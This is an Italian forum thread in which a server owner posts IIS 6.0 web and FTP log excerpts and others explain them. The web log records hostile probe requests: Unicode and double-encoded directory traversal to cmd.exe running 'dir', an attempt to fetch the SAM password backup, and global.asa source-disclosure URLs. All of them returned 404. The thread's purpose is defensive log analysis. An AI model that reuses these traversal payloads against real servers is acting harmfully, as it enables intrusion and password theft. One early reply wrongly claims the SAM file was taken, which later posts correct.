File di log di IIS strano....

[darrel]

Salve,
sul mio server aruba ho trovato questo file di log
mi potete dare una mano a capirlo??
grazie

#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2007-05-24 06:20:44
#Fields: date time s-sitename s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status sc-bytes cs-bytes
2007-05-24 06:20:44 W3SVC1 62.149.162.201 GET /global.asa%3F+.htr/ - 80 - 200.123.183.65 - - 62.149.162.201 404 0 123 1819 214
2007-05-24 06:20:44 W3SVC1 62.149.162.201 GET /global.asa/ - 80 - 200.123.183.65 - - 62.149.162.201 404 0 2 1819 206
2007-05-24 06:20:44 W3SVC1 62.149.162.201 GET /iissamples/exair/howitworks/codebrws.asp source=/login.asp 80 - 200.123.183.65 - - 62.149.162.201 404 0 3 1819 239
2007-05-24 06:20:44 W3SVC1 62.149.162.201 GET /global.asa%3F+.htr - 80 - 200.123.183.65 - - 62.149.162.201 404 0 123 1819 199
2007-05-24 06:20:44 W3SVC1 62.149.162.201 GET /iissamples/exair/howitworks/codebrws.asp source=/index.asp 80 - 200.123.183.65 - - 62.149.162.201 404 0 3 1819 239
2007-05-24 06:20:44 W3SVC1 62.149.162.201 GET /Linux.ida - 80 - 200.123.183.65 - - 62.149.162.201 404 0 2 1819 190
2007-05-24 06:20:44 W3SVC1 62.149.162.201 GET /global.asa+.htr - 80 - 200.123.183.65 - - 62.149.162.201 404 0 2 1819 196
2007-05-24 06:20:44 W3SVC1 62.149.162.201 GET /null.htw CiWebHitsFile=/global.asa%20&CiRestriction=none&CiHiliteType=Full 80 - 200.123.183.65 - - 62.149.162.201 404 2 1260 1819 255
2007-05-24 06:21:01 W3SVC1 62.149.162.201 GET /Index.html - 80 - 200.123.183.65 - - 62.149.162.201 200 0 0 1175 181
2007-05-24 06:21:01 W3SVC1 62.149.162.201 GET /scripts/..%C3%81%C5%93../winnt/system32/cmd.exe /c+dir 80 - 200.123.183.65 - - 62.149.162.201 404 0 3 1819 229
2007-05-24 06:21:01 W3SVC1 62.149.162.201 GET /msadc/..%C3%81%C5%93../..%C3%81%C5%93../..%C3%81%C5%93../winnt/system32/cmd.exe /c+dir 80 - 200.123.183.65 - - 62.149.162.201 404 0 3 1819 249
2007-05-24 06:21:02 W3SVC1 62.149.162.201 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 80 - 200.123.183.65 - - 62.149.162.201 404 0 3 1819 228
2007-05-24 06:21:02 W3SVC1 62.149.162.201 GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+dir 80 - 200.123.183.65 - - 62.149.162.201 404 0 3 1819 246
2007-05-24 06:21:02 W3SVC1 62.149.162.201 GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+dir+c:\*.cif/s/b 80 - 200.123.183.65 - - 62.149.162.201 404 0 3 1819 259
2007-05-24 06:21:04 W3SVC1 62.149.162.201 GET /a.asp/..%C3%81%C5%93../..%C3%81%C5%93../winnt/repair/sam - 80 - 200.123.183.65 - - 62.149.162.201 404 0 2 1819 225
2007-05-24 06:21:04 W3SVC1 62.149.162.201 GET /_vti_inf.html - 80 - 200.123.183.65 - - 62.149.162.201 404 0 2 1819 194

[OYS]

Premetto che non sono molto esperto riguardo questo campo.

Quello che penso è che c'è stata una comunicazione tra questi due IP (uno è tuo e l'altro è dell'hacker): 200.123.183.65 62.149.162.201.

Sembra che l'attacco provenga da un sistema Linux.

Da quello che vedo, attraverso questo: winnt/system32/cmd.exe (command), a fatto varie operazioni, e cosa più importante, ha prelevato questo file: winnt/repair/sam
Nel file SAM sono salvate tutte le password memorizzate sul computer (per esempio messenger) quindi se non l'hai già fatto, vai a cambiare le password!


Per avere certezze e approfondimenti, aspetta Habanero, o qualcuno che è più ferrato in questo campo.

[Habanero]

E' un tentativo di attacco a IIS. La vulnerabilità che hanno cercato di usare è molto vecchia. Se sei curioso cerca IIS Unicode Directory traversal. Era una vulnerabilità devastante che permetteva l'accesso all'intero file system del server.

Nel tuo log tutte le voci sono contraddistinte da un codice di stato http 404, cioè pagina non trovata. Questo è indice che l'attacco non è riuscito.

Come ti ha già detto OYS, hanno cercato di lanciare una istanza di cmd.exe per fagli eseguire un dir. Questo è stato fatto dalle cartelle standard di IIS /script/ e /msdac/ che hanno diritto di esecuzione. Hanno inoltre tentato di prelevare la copia di backup del file SAM creata all'atto dell'installazione del sistema operativo. Questo per cercare di craccare qualche password di acceso al sistema.

[darrel]

Ciao e grazie per la risposta...
volevo sapere
1)Hanno tentato di prelevare il file SAM o ci sono riusciti?(io comunque la pass la cambio)
2)Dove posso trovare una guida per leggere i file di Log?
3)Comunque il server ha tenuto bene o posso fare qualcosa in più per proteggerlo?
Grazie grazie grazie

[darrel]

ah! dimenticavo
per trovare chi è stato?
ho provato con superscan ma non ci capisco nulla...

[OYS]

Ti posso rispondere alla domanda 1:

Originariamente inviato da Habanero
Nel tuo log tutte le voci sono contraddistinte da un codice di stato http 404, cioè pagina non trovata. Questo è indice che l'attacco non è riuscito.

Non ci sono riusciti.

[darrel]

scusate un altra cosa ma questo è pure un tentativo di attacco?

#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2007-03-04 18:32:28
#Fields: time c-ip cs-method cs-uri-stem sc-status sc-win32-status
18:32:28 84.57.149.232 [36]USER anonymous 331 0
18:32:28 84.57.149.232 [36]PASS Jgpuser@home.com 530 1326

[Habanero]

suppongo che questo si riferisca al server FTP non al server web....

E' un semplice tentativo di login anonimo. Il codice 530 indicherebbe che l'utente non è stato autenticato. Verifica di aver disabilitato l'account anonymous sul tuo server.

Per leggere i log... la prima riga è sempre di intestazione e ti dice cosa rappresentano i vari campi. Ovviamente devi avere un minimo di cognizione su cosa rappresentano e sui protocolli.